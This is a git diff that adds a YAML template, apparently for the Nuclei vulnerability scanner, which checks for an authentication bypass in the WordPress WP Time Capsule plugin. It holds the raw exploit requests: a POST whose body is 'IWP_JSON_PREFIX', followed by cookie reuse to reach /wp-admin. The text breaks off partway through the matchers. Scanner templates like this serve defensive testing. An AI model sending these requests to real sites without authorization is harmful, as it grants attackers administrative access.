diff --git a/vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml b/vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml
new file mode 100644
index 0000000000..1c2f3b4036
--- /dev/null
+++ b/vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml
@@ -0,0 +1,49 @@
+id: wordpress-auth-bypass-wptimecapsule
+
+info:
+ name: WordPress WP Time Capsule Authentication Bypass
+ author: princechaddha
+ severity: critical
+ reference: https://github.com/SECFORCE/WPTimeCapsulePOC
+ tags: wordpress,auth-bypass,wp-plugin
+
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept: */*
+
+ IWP_JSON_PREFIX
+
+ - |
+ GET /wp-admin/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept: */*
+
+ cookie-reuse: true
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '